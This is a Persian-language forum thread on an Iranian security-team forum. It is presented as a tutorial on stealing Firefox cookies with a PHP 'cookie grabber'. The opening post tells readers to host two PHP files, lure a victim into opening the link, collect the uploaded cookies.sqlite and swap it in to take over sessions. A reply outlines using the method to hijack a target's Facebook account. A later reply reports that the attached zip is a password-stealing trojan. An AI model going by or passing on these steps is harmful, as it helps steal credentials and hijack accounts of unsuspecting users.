رفتن به مطلب
انجمن تیم امنیتی گارد ایران

آموزش دزدیدن کوکی و پسورد مرورگر از طریق کوکی گرابر با استفاده از تابع shell_exec


ارسال های توصیه شده

    در این تاپیک قصد دارم روشی رو بگم که با باز کردن سایتتون بشه کل کوکی های طرف رو هک کرد و روی هاست خودتون آپلود بشه من این روش را از سایت آشیانه یاد گرفتم

 

من خودم این روش را امتحان کردم در هاست رایگان و غیر رایگان اما هیچ اتفاقی نیفتاد به نظر شما آقایNET.HUN73R مشکل این دوفایل

 

index.php و upload.php در چیست  من  تست کردم و به نتیجه نرسیدم    و چطور می توانم تشخیص بدهم که  در هاست غیررایگان یا رایگان این تابع

 

shell_exec فعال است یا نه ؟ اگر می شود خودتان برای من این دو فایلindex.php و upload.php  را  نگاه و تست کنید و بگویید مشکل از کجاست ؟

 

البته یک روش دیگر هم گفتم که اون روش قبلی با فایل log.php بود اون خیلی بهتر بود چون احتیاجی به تابع shell_exec نداشت و یک روش نوین بود .

    خب این روش مستلزم اینه که روی هاست شما*تابعshell_exec *فعال باشه...بسیاری از هاستهای رایگان این قابلیت رو غیرفعال میکنند...بنابراین توصیه ما به شما اینه که چنین هاستی پیدا نکردید از یک هاست اختصاصی برای این روش استفاده کنید...همیشه که نباید هلو بره تو گلوو*هک کامل کوکی های مرورگر فقط با بازکردن سایت

    این ورژن از کوکی گرابر برای مرورگر فایرفاکس طراحی شده که با کمی تغییر میشه اون واسه مرورگرهای دیگه هم به کار برد...دیگه اونش با خودتون*


    خب بریم سراغ اصل مطلب :

    شما باید این دو تا فایل رو به نام های index.php و upload.php رو که براتون در داخل فایل zip پیوست کردم داخل هاستتون آپلود کنید و لینک سایتتونو به طرف بدید مثل yoursite.com....البته میتونید فایل index.php رو تغییر نام بدید...بعد میتونید لینک سایت رو به طرف بدید و وقتی طرف لینک رو باز میکنه کوکی های فایرفاکس که اسم فایلش cookies.sqlite هست در هاست شما آپلود میشه....البته اگه حجم کوکی ها زیاد باشه ممکنه به دلیل سرعت پایین اینترنت مشکل پیش بیاد ولی معمولا حجم زیادی نداره...بعد شما باید فایل cookies.sqlite هک شده رو با فایل cookies.sqlite خودتون replace کنید...

    فقط یه نکته دیگه مونده و اونم اینه که فایل upload.php نیاز به ویرایش داره و داخل سورس برنامه باید به جای yoursite نام سایتتونو وارد کنید

    اینم یکی از روش های هک کوکی هست که بسیار خطرناکه و حالا شما میدونید که نباید از هرکسی لینک بگیرید و بازش کنید

   لینک دانلود کوکی گرابر :

Firefox Cookie Grabber.zip

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام خدمت دوست عزیز

اولا فایل هارو پیوست نکردین

دوما اینکه لینک آموزشو بزارید تا بررسی بشه

اگهمیخوای هم کوکی بدزدی :سناریو زیر توجه کن

تو یه هدف داری میخوای اکانت فیسشو هک کنی حالا برای این راه میتونی کوکیاشو بدست بیاری 

ولی اگه کوکی ها تو مرورگر سیو نباشه کارتبی فایدس چون الان همه از خطرات اگاهن و کارهای ایمنی رو انجام میدن 

بهمین دلیل کار دزدین کوکی اتمال موفقیتش نصف نصفه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام فایل پیوست شد اشکالی نداره کوکی تو مرورگر هم سیو نباشه من می خواهم این روش را یاد بگیرم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 3 ماه بعد...

مسئولین سایت رسیدگی کنید

فایل پیوست یک تروجان با نام  PSW.Agent.JZ داراست که به عنوان استخراج نمودن پسورد های سیو شده در کوکی مرورگربکار می رود.

هر چه سریعتر رسیدگی و اقدام کنید تا از سادگی کاربران سوء استفاده نشود

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...